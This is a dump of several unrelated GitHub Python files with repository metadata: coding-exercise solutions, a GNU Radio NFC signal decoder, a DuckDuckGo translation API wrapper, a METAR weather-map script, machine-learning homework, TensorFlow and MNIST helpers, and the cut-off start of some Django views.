raw_input().split())\r\n integers = map(int, raw_input().split())\r\n maxVal = 0\r\n for index in range(size) :\r\n found = False\r\n series_sum = 0\r\n for subindex in range(index, size) :\r\n series_sum += sum(integers[index:subindex + 1])%modulo\r\n \r\n \r\n\r\n\r\n## for index in range(size) :\r\n## rightSeriesSum = 0\r\n## leftSeriesSum = 0\r\n## found = 0\r\n## for subindex in range(index, size) :\r\n## rightSeriesSum += integers[subindex]\r\n## if rightSeriesSum % M > maxVal :\r\n## maxVal = rightSeriesSum\r\n## if maxVal == M - 1 :\r\n## found = 1\r\n## break\r\n## if found == 1 :\r\n## break\r\n\r\n## for subindex in range(index+1) :\r\n## leftSeriesSum += integers[subindex]\r\n## if leftSeriesSum % M > maxVal :\r\n## maxVal = rightSeriesSum\r\n## if maxVAl == M - 1 :\r\n## found = 1\r\n## break\r\n## if found == 1 :\r\n## break\r\n\r\n## print maxVal\r\n\r\n \r\n \r\n","repo_name":"108krohan/codor","sub_path":"hackerrank-python/algorithm/searching/maximiseSum.py","file_name":"maximiseSum.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35521229343","text":"#!/usr/bin/env python\n\n# Written by Ilias Giechaskiel\n# https://ilias.giechaskiel.com\n# June 2015\n\nfrom gnuradio import gr\nfrom gnuradio import blocks\n\nimport usrp_src\nimport transition_sink\nimport background\nimport record\n\nclass decoder(gr.hier_block2):\n def __init__(self, src=\"uhd\", dst=None, repeat=False, reader=True, tag=True, samp_rate=2e6, emulator=None):\n gr.hier_block2.__init__(self, \"decoder\",\n gr.io_signature(0, 0, 0), # Input signature\n gr.io_signature(0, 0, 0)) # Output signature\n\n if src == \"uhd\":\n self._src = usrp_src.usrp_src(samp_rate=samp_rate, dst=dst)\n hi_val = 1.1\n else:\n self._wav = blocks.wavfile_source(src, repeat)\n self._r2c = blocks.float_to_complex(1)\n self._src = blocks.complex_to_mag_squared(1)\n self.connect(self._wav, self._r2c, self._src)\n hi_val = 1.09 # may need to be set to 1.05 depending on antenna setup\n\n self._back = background.background(reader, tag, emulator)\n self._trans = transition_sink.transition_sink(samp_rate, self._back.append, hi_val=hi_val)\n self.connect(self._src, self._trans)\n","repo_name":"giech/usrp_nfc","sub_path":"code/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"99"} +{"seq_id":"14228937895","text":"class Solution:\n def subsets(self, nums):\n sets = set({})\n\n def itr(elements, opts):\n sets.add(tuple(elements))\n\n for idx, opt in enumerate(opts):\n itr(elements+[opt], opts[idx+1:])\n\n itr([], nums)\n\n resp = []\n\n for e in sets:\n resp.append(list(e))\n\n return resp\n\nprint(Solution().subsets([1,2,3]))\n","repo_name":"Th3Lourde/l33tcode","sub_path":"problemSets/top75/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22975069386","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nA Translation module.\n\nYou can translate text using this module.\n\"\"\"\nimport re\nimport time\nfrom random import choice, expovariate\nfrom urllib.parse import urlencode, urlparse, urlunparse\nfrom functools import wraps\nfrom typing import Callable\n\nimport requests\n\nfrom .models import Translated\nfrom .constants import (USERAGENTS, DEFAULT_RAISE_EXCEPTION, BASE_URL,\n DUMMY_DATA, LANGCODES, 
LANGUAGES, HEADERS, PHRASES)\nfrom .exceptions import ConnectionException, BadResponseException\n\n\ndef _retry_on_connection_error(func: Callable) -> Callable:\n \"\"\"Decorator to retry the function max_connection_attemps number of times.\n\n Herewith-decorated functions need an ``_attempt`` keyword argument.\n\n This is to decorate functions that do network requests that may fail.\n Functions that only use these for network access must not be decorated with this decorator.\"\"\"\n @wraps(func)\n def call(translator, *args, **kwargs):\n try:\n return func(translator, *args, **kwargs)\n except BadResponseException as err:\n error_string = f\"{func.__name__}({', '.join([repr(arg) for arg in args])}): {err}\"\n if (kwargs.get('_attempt') or 1) == translator.max_connection_attempts:\n raise ConnectionException(error_string) from None\n try:\n if kwargs.get('_attempt'):\n kwargs['_attempt'] += 1\n else:\n kwargs['_attempt'] = 2\n translator._do_sleep()\n return call(translator, *args, **kwargs)\n except ConnectionException:\n raise ConnectionException(error_string) from None\n return call\n\n\nclass Translator:\n \"\"\"Duckduckgo Translator API\n\n :param user_agent: the User-Agent header to send when making requests.\n :type user_agent: :class:`str`\n\n :param timeout: Definition of timeout for httpx library.\n Will be used for every request.\n :type timeout: :class:`int`\n\n :param raise_exception: if `True` then raise exception if something goes wrong\n :type raise_exception: :class:`bool`\n\n :param headers: Headers for requests.\n :type headers: :class:`dict`\n\n :param query_string: Query string for vqd.\n :type query_string: :class:`str`\n\n :param sleep: if `True` then during `max_connection_attempts` wait before request.\n :type sleep: :class:`bool`\n\n :param max_connection_attempts: Maximum number of connection attempts until a\n request is aborted. Defaults to 3.\n Set this to 0 to retry infinitely.\n :type max_connection_attempts: :class:`int`\n \"\"\"\n\n def __init__(\n self, useragent=None, raise_exception=DEFAULT_RAISE_EXCEPTION,\n timeout=5, headers=None, query_string=None, max_connection_attempts=3, sleep=False):\n\n self.timeout = timeout\n self.raise_exception = raise_exception\n self.sleep = sleep\n self.max_connection_attempts = max_connection_attempts\n\n self.headers = headers\n if not self.headers:\n self.headers = HEADERS\n\n self.useragent = useragent\n if self.useragent:\n self.headers['User-Agent'] = self.useragent\n\n self.query_string = query_string\n if not self.query_string:\n self.query_string = choice(PHRASES)\n\n self.vqd = self._get_vqd(self.query_string)\n\n @_retry_on_connection_error\n def _get_vqd(self, query_string: str) -> str:\n \"\"\"Return vqd string. 
Required for Duckduckgo api.\"\"\"\n\n # For getting random vqd...\n query_params = {'q': query_string}\n\n # Build req url\n vqd_req_url = urlunparse(\n urlparse(BASE_URL)._replace(query=urlencode(query_params)))\n \n vqd_res = requests.get(vqd_req_url, headers=self.headers, timeout=self.timeout)\n\n vqd: str = ''\n\n vqd_list = re.findall('vqd=\"([^\"]*)\"', vqd_res.text)\n if vqd_list:\n vqd = vqd_list[0]\n\n return vqd\n\n def _change_vqd(self):\n new_phrase = choice(PHRASES)\n\n while self.query_string == new_phrase:\n new_phrase = choice(PHRASES)\n\n self.query_string = new_phrase\n self.vqd = self._get_vqd(self.query_string)\n\n def _change_useragent(self):\n new_useragent = choice(USERAGENTS)\n\n while self.headers['User-Agent'] == new_useragent:\n new_useragent = choice(USERAGENTS)\n\n self.headers['User-Agent'] = new_useragent\n\n @_retry_on_connection_error\n def _translate(self, text: str, dest: str, src: str = '', _attempt: int = 1):\n \"\"\"Low-level communication with duckduckgo.com\"\"\"\n\n # Max lenth is 1000 for data\n text = text.strip()[:1000]\n data = text[:text.rfind('.') + 1] if len(text) == 1000 else text\n\n # Set query params\n query_params = {\n 'vqd': self.vqd,\n 'query': self.query_string,\n 'to': dest,\n }\n\n # if `from` is not in `query_params` then duckduckgo detects `from`\n if src:\n query_params.update({'from': src})\n\n # build `req_url` from `BASE_URL`\n req_url = urlunparse(\n urlparse(BASE_URL)._replace(query=urlencode(query_params), path='translation.js'))\n\n res = requests.post(req_url, data=data, timeout=self.timeout, headers=self.headers)\n\n if res.ok:\n return res.json(), res\n\n if self.raise_exception:\n exception_message = f'Unexpected status code \"{res.status_code}\" from {res.url}' \\\n f'\\nResponse text is {res.text}'\n raise BadResponseException(exception_message)\n\n return DUMMY_DATA, res\n\n def _do_sleep(self):\n if self.sleep:\n time.sleep(min(expovariate(0.6), 10.0))\n\n def translate(\n self, text: str, src: str='', dest: str='en',\n new_useragent: bool=False, new_vqd: bool=False):\n \"\"\"Return translated text.\n\n :param text: Text to translate, if text length more than\n 1000 then splits first 1000.\n\n :param src: Source language.\n\n :param dest: Destionation language.\n\n :param new_useragent: if `True` then use new useragent for request.\n\n :param new_vqd: if `True` then use new new_vqd for request.\"\"\"\n\n src = src.lower()\n dest = dest.lower()\n\n if src and src not in LANGUAGES:\n if src in LANGCODES:\n src = LANGCODES[src]\n else:\n raise ValueError('invalid source language')\n\n if dest not in LANGUAGES:\n if dest in LANGCODES:\n dest = LANGCODES[dest]\n else:\n raise ValueError('invalid destination language')\n\n\n ## I do not know what is vqd, but it seems like an identifier,\n # cause its required for translation, let user can reset it.\n if new_vqd:\n self._change_vqd()\n if new_useragent:\n self._change_useragent()\n\n data, response = self._translate(text, dest, src)\n\n translated = data['translated']\n detected = data['detected_language']\n\n result = Translated(\n src=src, dest=dest, text=translated, origin=text,\n detected=detected, response=response)\n\n return result\n","repo_name":"metebtg/duckduckgo_translate","sub_path":"src/duckduckgo_translate/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} 
+{"seq_id":"74019562246","text":"#-----------------------------------------------------------------------------------------------------------\r\n# INPE / CPTEC - Training: Python and GOES-R Imagery: Script 25 - METAR Plot\r\n# Author: Diego Souza\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Adapted from: https://unidata.github.io/MetPy/latest/examples/plots/Station_Plot.html\r\n\r\nimport matplotlib.pyplot as plt # Plotting library\r\nimport cartopy, cartopy.crs as ccrs # Plot maps\r\nimport cartopy.io.shapereader as shpreader # Import shapefiles\r\nimport cartopy.feature as cfeature # Common drawing and filtering operations\r\nimport os # Miscellaneous operating system interfaces\r\nimport numpy as np # Scientific computing with Python\r\nimport requests # HTTP library for Python\r\nfrom datetime import timedelta, date, datetime # Basic Dates and time types\r\nfrom metpy.calc import reduce_point_density # Provide tools for unit-aware, meteorological calculations \r\nfrom metpy.io import metar # Parse METAR-formatted data\r\nfrom metpy.plots import current_weather, sky_cover, StationPlot # Contains functionality for making meteorological plots\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Select the extent [min. lon, min. lat, max. lon, max. lat]\r\nextent = [-93.0, -60.00, -25.00, 18.00]\r\n\r\n# Input and output directories\r\ndir = \"Samples\"; os.makedirs(dir, exist_ok=True)\r\noutput = \"Output\"; os.makedirs(output, exist_ok=True)\r\n\r\n# Download the METAR File\r\n#date = datetime.today().strftime('%Y%m%d')\r\ndate = '20210702' # CHANGE THIS DATE TO THE SAME DATE OF YOUR NWP DATA\r\nurl = 'https://thredds-test.unidata.ucar.edu/thredds/fileServer/noaaport/text/metar' \r\nfile_name = 'metar_' + date + '_0000.txt'\r\n\r\n# Sends a GET request to the specified url\r\nmyfile = requests.get(url + '//' + file_name)\r\n\r\n# Download the file\r\nopen(dir + '//' + file_name, 'wb').write(myfile.content)\r\n\r\n# METAR File\r\n# https://unidata.github.io/MetPy/latest/examples/plots/Station_Plot.html\r\ndata = metar.parse_metar_file(dir + '//' + file_name)\r\n\r\n# Drop rows with missing winds\r\ndata = data.dropna(how='any', subset=['wind_direction', 'wind_speed'])\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Choose the plot size (width x height, in inches)\r\nplt.figure(figsize=(8,8))\r\n\r\n# Set up the map projection\r\nproj = ccrs.PlateCarree()\r\n\r\n# Use the Geostationary projection in cartopy\r\nax = plt.axes(projection=proj)\r\n\r\n# Define the image extent\r\nimg_extent = [extent[0], extent[2], extent[1], extent[3]]\r\nax.set_extent([extent[0], extent[2], extent[1], extent[3]], ccrs.PlateCarree())\r\n\r\n\r\n# Change the DPI of the resulting figure. 
Higher DPI drastically improves the\r\n# look of the text rendering.\r\nplt.rcParams['savefig.dpi'] = 255\r\n\r\n# Use the Cartopy map projection to transform station locations to the map and\r\n# then refine the number of stations plotted by setting a minimum radius\r\npoint_locs = proj.transform_points(ccrs.PlateCarree(), data['longitude'].values, data['latitude'].values)\r\ndata = data[reduce_point_density(point_locs, 3)]\r\n\r\n# Add some various map elements to the plot to make it recognizable.\r\nax.add_feature(cfeature.LAND)\r\nax.add_feature(cfeature.OCEAN)\r\n\r\n# Add a shapefile\r\n# https://geoftp.ibge.gov.br/organizacao_do_territorio/malhas_territoriais/malhas_municipais/municipio_2019/Brasil/BR/br_unidades_da_federacao.zip\r\nshapefile = list(shpreader.Reader('BR_UF_2019.shp').geometries())\r\nax.add_geometries(shapefile, ccrs.PlateCarree(), edgecolor='gray',facecolor='none', linewidth=0.3)\r\n\r\n# Add coastlines, borders and gridlines\r\nax.coastlines(resolution='10m', color='black', linewidth=0.8)\r\nax.add_feature(cartopy.feature.BORDERS, edgecolor='black', linewidth=0.5)\r\ngl = ax.gridlines(crs=ccrs.PlateCarree(), color='white', alpha=1.0, linestyle='--', linewidth=0.25, xlocs=np.arange(-180, 180, 5), ylocs=np.arange(-90, 90, 5), draw_labels=True)\r\ngl.top_labels = False\r\ngl.right_labels = False\r\n\r\n#-----------------------------------------------------------------------------------------------------------\r\n# Station Plot\r\n\r\n# Start the station plot by specifying the axes to draw on, as well as the\r\n# lon/lat of the stations (with transform). We also the fontsize to 12 pt.\r\nstationplot = StationPlot(ax, data['longitude'].values, data['latitude'].values,\r\n clip_on=True, transform=ccrs.PlateCarree(), fontsize=8)\r\n\r\n# Plot the temperature and dew point to the upper and lower left, respectively, of\r\n# the center point. Each one uses a different color.\r\nstationplot.plot_parameter('NW', data['air_temperature'].values, color='red')\r\nstationplot.plot_parameter('SW', data['dew_point_temperature'].values,\r\n color='darkgreen')\r\n\r\n# A more complex example uses a custom formatter to control how the sea-level pressure\r\n# values are plotted. This uses the standard trailing 3-digits of the pressure value\r\n# in tenths of millibars.\r\nstationplot.plot_parameter('NE', data['air_pressure_at_sea_level'].values,\r\n formatter=lambda v: format(10 * v, '.0f')[-3:])\r\n\r\n# Plot the cloud cover symbols in the center location. This uses the codes made above and\r\n# uses the `sky_cover` mapper to convert these values to font codes for the\r\n# weather symbol font.\r\nstationplot.plot_symbol('C', data['cloud_coverage'].values, sky_cover)\r\n\r\n# Same this time, but plot current weather to the left of center, using the\r\n# `current_weather` mapper to convert symbols to the right glyphs.\r\nstationplot.plot_symbol('W', data['present_weather'].values, current_weather)\r\n\r\n# Add wind barbs\r\n#stationplot.plot_barb(data['eastward_wind'].values, data['northward_wind'].values)\r\n\r\n# Also plot the actual text of the station id. 
Instead of cardinal directions,\r\n# plot further out by specifying a location of 2 increments in x and 0 in y.\r\nstationplot.plot_text((2, 0), data['station_id'].values)\r\n\r\n# Add a title\r\nplt.title('METAR | ' + date + ' 00:00 UTC | UNIDATA THREDDS Data Server', fontsize=8, loc='center')\r\n#-----------------------------------------------------------------------------------------------------------\r\n\r\n# Save the image\r\nplt.savefig(f'{output}/image_25.png', bbox_inches='tight', pad_inches=0, dpi=300)\r\n\r\nplt.show()","repo_name":"diegormsouza/NWP-Python-Jul-2021","sub_path":"script_25.py","file_name":"script_25.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"99"} +{"seq_id":"3633872547","text":"import numpy as np\nimport matplotlib.pyplot as mp\nimport scipy\nimport math\nimport sympy\nfrom decimal import Decimal\n\ndef DoQuestion3():\n fig = mp.figure()\n ax = mp.subplot(111)\n elpsilon = 0.05\n d_vc = 10\n x = []\n y = []\n loop = 0\n var = 1000\n for N in range(10000000):\n if scipy.mod(N,100) == 5:\n var = var * 3\n loop += 1\n value = 4 *((2*N) ** d_vc) * math.exp(-(elpsilon**2)*N/8)\n if (1 == loop):\n lastValue = value\n x.append(N)\n y.append(value)\n\n print (value - 0.05,lastValue - 0.05)\n if scipy.sign(value - 0.05) != scipy.sign(lastValue - 0.05):\n print (scipy.sign(value - 0.05),scipy.sign(lastValue - 0.05))\n break\n lastValue = value\n\n\n z1 = np.array(x)\n z2 = np.array(y)\n ax.plot(z1[:], z2[:], '*', label='$y = Value$')\n #top = 10**10\n #ax.set_ylim(0,top)\n\n mp.title('Visualization of Dataset')\n ax.legend(loc='upper left', fontsize='small')\n fig.show()\n\ndef DoQuestion4And5():\n delta = 0.05\n d_vc = 50\n N = 10000\n\n # Original VC bound:\n elpsilon1 = math.sqrt((8 / N)*math.log((4 * ((2 * N)**d_vc))/ delta))\n\n # Rademacher Penalty Bound\n elpsilon2 = math.sqrt(2 * sympy.log((2 * N * ((N)**d_vc)))/ N) + math.sqrt((2/N)* sympy.log(1/delta)) + 1 / N\n\n # Parrondo and Van den Broek\n elpsilon3 = sympy.Symbol(\"elpsilon3\")\n lnFactor = round(math.log((6 * ((2 * N)**d_vc))/ delta),2)\n elpsilon3 = sympy.solve(sympy.sqrt((2 * elpsilon3 + lnFactor)/ N) - elpsilon3,elpsilon3)\n\n # Devroye\n elpsilon4 = sympy.Symbol(\"elpsilon4\")\n exp1 = 4 * (Decimal(N ** 2) ** d_vc)/ Decimal(delta)\n lnFactor = exp1.ln() # math.log返回inf\n elpsilon4 = sympy.solve(sympy.sqrt((1 / (2 * N)) * (4 * elpsilon4 * (1 + elpsilon4) + lnFactor)) - elpsilon4,elpsilon4)\n\n # Variant VC bound\n elpsilon5 = sympy.Symbol(\"elpsilon5\")\n elpsilon5 = math.sqrt((16 / N) * math.log((2 * ((N) ** d_vc))/sympy.sqrt(delta)))\n\n print ('Original VC bound',elpsilon1,\n '\\nRademacher Penalty Bound: ',elpsilon2,\n '\\nParrondo and Van den Broek: ',elpsilon3[0],\n '\\nDevroye: ',elpsilon4[0],\n '\\nelpsilon5: ',elpsilon5)\n\ndef sign(x):\n if x <= 0:\n return -1\n return 1\n\n\ndef DoQuestion17_method1():\n LoopNum = 5000\n dataLen = 20\n noiseProbality = 0.2\n\n Sum_Ein = 0\n Sum_Eout = 0\n for loop in range(LoopNum):\n E_in,E_out = SearchEinInPositiveAndNegativeRays(dataLen,noiseProbality)\n Sum_Ein += E_in\n Sum_Eout += E_out\n print ('Average E_in:',Sum_Ein / LoopNum,',Average E_out:',Sum_Eout / LoopNum)\n\n\ndef SearchEinInPositiveAndNegativeRays(dataLen,noiseProbality):\n data = np.random.uniform(low=-1.0, high=1.0, size=dataLen)\n data = sorted(data) # 这个排序属于隐藏条件,不排序E_in只有0.3,排序后有0.15\n s_x = [sign(element) for element in data]\n noiseLocation = np.random.random_integers(low=0, high=dataLen - 1, 
size=int(dataLen * noiseProbality))\n\n for theta in range(int(dataLen * noiseProbality)): # 随机生成四个位置设置为噪点,将符号位取反\n s_x[noiseLocation[theta]] = -1 * s_x[noiseLocation[theta]]\n\n Ein = len(s_x)\n LocationOfMinE_in = 0\n signOfMinE_in = -1\n leftSign = -1\n rightSign = 1\n for symbor in range(2): # 因为是 positive and negative rays 所以需要尝试两次\n leftSign = -1 * leftSign\n rightSign = -1 * rightSign\n for theta in range(len(s_x) + 1):\n leftErrorNum = 0\n rightErrorNum = 0\n leftNum = 0\n rightNum = 0\n for i in range(theta):\n if i >= len(s_x):\n continue\n leftNum += 1\n if leftSign != s_x[i]:\n leftErrorNum += 1\n for i in range(len(s_x) + 1 - theta):\n if i + theta >= len(s_x):\n continue\n rightNum += 1\n if rightSign != s_x[i + theta]:\n rightErrorNum += 1\n sumError = leftErrorNum + rightErrorNum\n if (sumError < Ein):\n Ein = sumError\n LocationOfMinE_in = theta\n signOfMinE_in = leftSign\n\n if LocationOfMinE_in + 1 < len(s_x):\n bestTheta = (s_x[LocationOfMinE_in] + s_x[LocationOfMinE_in + 1])/2\n else:\n bestTheta = 1\n E_out = 0.5 + 0.3 * signOfMinE_in * (np.abs(bestTheta) - 1)\n print ('ErrorRate: ',Ein/len(s_x),LocationOfMinE_in,',E_out: ',E_out)\n return Ein/len(s_x), E_out\n\ndef signArray(x):#自定义符号函数,只返回-1,+1\n ret=np.ones(x.shape)\n for i,each in enumerate(x):\n if each<0: ret[i]=-1\n return ret\n\ndef getTheta(x): # 由输入的x生成假设空间的所有theta的序列\n n = len(x)\n l1 = sorted(x) #为什么要排序?\n theta = np.zeros(n)\n for i in range(n - 1):\n theta[i] = (l1[i] + l1[i + 1]) / 2\n theta[-1] = 1\n return theta\n\n\ndef DoQuestion17_method2():\n data_size = 3\n expes = 5000\n E_in = 0\n E_out = 0\n for i in range(expes):\n x = np.random.uniform(-1, 1, data_size)\n noise_rate = 0.2\n # 生成[-0.2,0.8]范围内的随机数组,取sign()即变为有20%的-1的随机数组\n noise = signArray(np.random.uniform(size=data_size) - noise_rate)\n y = signArray(x) * noise # 为y加上20%的噪声\n theta = getTheta(x)\n print(x)\n print(theta)\n e_in = np.zeros((2, data_size)) # 对每个theta求出一个error_in,第一行是s=1,第2行是s=-1.\n for i in range(len(theta)):\n a1 = y * signArray(x - theta[i])\n print ('a1:',a1,',np.sum(a1):',np.sum(a1),',np.sum(-a1):',np.sum(-a1))\n e_in[0][i] = (data_size - np.sum(a1)) / (2 * data_size) # 数组只有-1和+1,可直接计算出-1所占比例\n e_in[1][i] = (data_size - np.sum(-a1)) / (2 * data_size)\n print ('E_in[0]:',e_in[0][i],',e_in[1][i]:',e_in[1][i])\n s = 0\n theta_best = 0\n min0, min1 = np.min(e_in[0]), np.min(e_in[1])\n if min0 < min1:\n s = 1\n theta_best = theta[np.argmin(e_in[0])]\n else:\n s = -1\n theta_best = theta[np.argmin(e_in[1])]\n e_out = 0.5 + 0.3 * s * (np.abs(theta_best) - 1)\n E_in += np.min(e_in)\n E_out += np.min(e_out)\n ave_in = E_in / expes\n ave_out = E_out / expes\n print(ave_in,ave_out)\n\n\ndef TestSympy():\n a = sympy.Symbol('a')\n y = sympy.solve(sympy.sqrt(2*a)-4,a)\n print (y)\n\n\ndef LoadDataInfo(file):\n data = []\n label = []\n lineNum = 0\n with open(file) as f:\n line = f.readline()\n while line:\n lineArray = line.split()\n for i in range(len(lineArray) - 1):\n data.append(float(lineArray[i]))\n label.append(int(lineArray[9]))\n line = f.readline()\n lineNum += 1\n dataArray = np.array(data)\n dataArray = dataArray.reshape(lineNum,9)\n\n labelArray = np.array(label)\n return dataArray,labelArray\n\n\ndef DoDecisionStump(data, label):\n data_size = len(data)\n theta = getTheta(data)\n e_in = np.zeros((2, data_size))\n for i in range(len(theta)):\n a1 = label * signArray(data - theta[i])\n e_in[0][i] = (data_size - np.sum(a1)) / (2 * data_size)\n e_in[1][i] = (data_size - np.sum(-a1)) / (2 * data_size)\n\n s = 0\n min0, min1 = 
np.min(e_in[0]), np.min(e_in[1])\n if min0 < min1:\n s = 1\n theta_best = theta[np.argmin(e_in[0])]\n else:\n s = -1\n theta_best = theta[np.argmin(e_in[1])]\n E_in = np.min(np.min(e_in))\n return s, theta_best, E_in\n\ndef getData_i(X_train,i):#获取第d维数据\n return np.reshape(X_train[:,i],len(X_train))#从ndarray二维数组转为array一维数组\n\n\ndef DoQuestion19():\n PlaFilePath = 'G:\\\\林轩田教程\\\\MachineLearningFoundations\\\\homework2\\\\data\\\\decisionTrumpTrainData.txt'\n data, label = LoadDataInfo(PlaFilePath)\n e_in = np.zeros(9)\n s = np.zeros(9)\n theta = np.zeros(9)\n\n for i in range(9):\n s[i], theta[i], e_in[i] = DoDecisionStump(getData_i(data,i),label)\n\n E_in = np.min(e_in)\n dimension = np.argmin(e_in)\n theta_best = theta[dimension]\n s_best = s[dimension]\n\n PlaFilePath = 'G:\\\\林轩田教程\\\\MachineLearningFoundations\\\\homework2\\\\data\\\\decisionTrumpTestData.txt'\n data, label = LoadDataInfo(PlaFilePath)\n test_len = len(label)\n X_i = getData_i(data, dimension)\n q = label * s_best * signArray(X_i - theta_best)\n E_out = (test_len - np.sum(q)) / (2 * test_len)\n print(E_in, E_out)\n\nif __name__ == \"__main__\":\n # DoQuestion3()\n #DoQuestion4And5()\n\n #DoQuestion17_method1()\n DoQuestion17_method2() # 网上提供的另外一种思路\n #DoQuestion19()\n pass\n","repo_name":"SailBlade/MachineLearningFoundations_Coursera","sub_path":"homework2/homeWork2.py","file_name":"homeWork2.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"73432589124","text":"import tensorflow as tf\nimport os\nimport freeze_graph\n\n\ndef freeze_model(input_graph_path,output_graph_path,output_node_names,checkpoint_path):\n # routine.\n input_saver_def_path = \"\"\n input_binary = False\n restore_op_name = \"save/restore_all\"\n filename_tensor_name = \"save/Const:0\"\n clear_devices = False\n\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path,\n output_node_names, restore_op_name,\n filename_tensor_name, output_graph_path,\n clear_devices, \"\")\n\n\ndef load_model(frozen_graph_filename):\n # First we need to load the protobuf file from the disk and parse it to retrieve the \n # Unserialized graph_def\n with tf.gfile.GFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n # Then, we can use again a convenient built-in function to import a graph_def into the \n # current default Graph\n with tf.Graph().as_default() as graph:\n tf.import_graph_def(\n graph_def, \n input_map=None, \n return_elements=None, \n name=\"prefix\", \n op_dict=None, \n producer_op_list=None\n )\n return graph","repo_name":"ivancruzbht/TextCNN","sub_path":"model_export.py","file_name":"model_export.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"28816046646","text":"# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定\nimport numpy as np\nimport pickle\nfrom dataset.mnist import load_mnist\nfrom common.functions import sigmoid, softmax\n\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, flatten=True, one_hot_label=False)\n return x_test, t_test\n\n\ndef init_network():\n #pklファイルには重みとバイアスのパラメータがディクショナリ型の変数として保存されたいる\n with open(\"deep-learning-from-scratch-master\\ch03\\sample_weight.pkl\", 'rb') as f:\n network = pickle.load(f)\n return network\n\n\ndef predict(network, 
x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\n#xは実際試験する問題,tはxの解答\nx, t = get_data()\nnetwork = init_network()\n\n#バッチ数\nbatch_size = 100\n\naccuracy_cnt = 0\n#xに格納された画像データを一枚ずつ分類\n#len関数は,リストや辞書のサイズを取得する\n#range関数は(start,end,step)のような書き方でstartからend-1までの整数からなるリストを作成する\n#さらに,リストの要素の次の値がstepで指定された値だけ増加するリストを作成\nfor i in range(0, len(x), batch_size):\n #x[0:100],x[100:200]の順で作成していく\n x_batch = x[i:i+batch_size]\n y_batch = predict(network, x_batch)\n #axsis = 1により,100×10の配列の中で一次元目の要素ごとに,最大値のインデックスを求める\n p = np.argmax(y_batch, axis=1)\n accuracy_cnt += np.sum(p == t[i:i+batch_size])\n\n\n # y = predict(network, x[i])\n # 最も確率の高い要素のインデックスを取得(引数に与えられた配列の要素の中から最大の値を取得)\n # p= np.argmax(y) \n # if p == t[i]:\n #正解した割合を認識精度としている\n # accuracy_cnt += 1\n\nprint(\"Accuracy:\" + str(float(accuracy_cnt) / len(x)))\n\n#そもそもなぜ正規化するのか?\n#端的に言うと,いろんな単位のデータを入力としてディープラーニングで学習させるより,\n# 共通の尺度で統一された値を入力データとして与えた方が精度がいい学習モデルができるから\n","repo_name":"souta1214/souta_study","sub_path":"deep-learning-from-scratch-master/ch03/neuralnet_mnist.py","file_name":"neuralnet_mnist.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74420667524","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n.. module:: offers\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.text import slugify\nfrom django.views.generic import View\n\nfrom apps.volontulo.forms import OfferApplyForm\nfrom apps.volontulo.lib.email import send_mail\nfrom apps.volontulo.models import Offer\nfrom apps.volontulo.models import UserProfile\nfrom apps.volontulo.utils import correct_slug\nfrom apps.volontulo.views import logged_as_admin\n\n\nclass OffersList(View):\n \"\"\"View that handle list of offers.\"\"\"\n\n @staticmethod\n def get(request):\n \"\"\"It's used for volunteers to show active ones and for admins to show\n all of them.\n\n :param request: WSGIRequest instance\n \"\"\"\n if logged_as_admin(request):\n offers = Offer.objects.all()\n else:\n offers = Offer.objects.get_active()\n\n return render(request, \"offers/offers_list.html\", context={\n 'offers': offers,\n })\n\n @staticmethod\n def post(request):\n \"\"\"Method responsible for rendering form for new offer.\n\n :param request: WSGIRequest instance\n \"\"\"\n if (\n request.POST.get('edit_type') == 'status_change' and\n request.POST.get('offer_id')\n ):\n offer = get_object_or_404(Offer, id=request.POST.get('offer_id'))\n offer.publish()\n messages.success(request,\n \"Aktywowałeś ofertę '%s'\" % offer.title)\n return redirect('offers_list')\n\n\nclass OffersReorder(View):\n \"\"\"Class view supporting change of a offer.\"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n user = self.request.user\n if (\n not user.is_authenticated() or\n not user.userprofile.is_administrator\n ):\n return redirect('offers_list')\n return super(OffersReorder, self).dispatch(request, *args, **kwargs)\n\n @staticmethod\n def get(request, id_):\n \"\"\"Display offer list with weights GET request.\n\n :param request: WSGIRequest instance\n :param id_:\n :return:\n \"\"\"\n offers = 
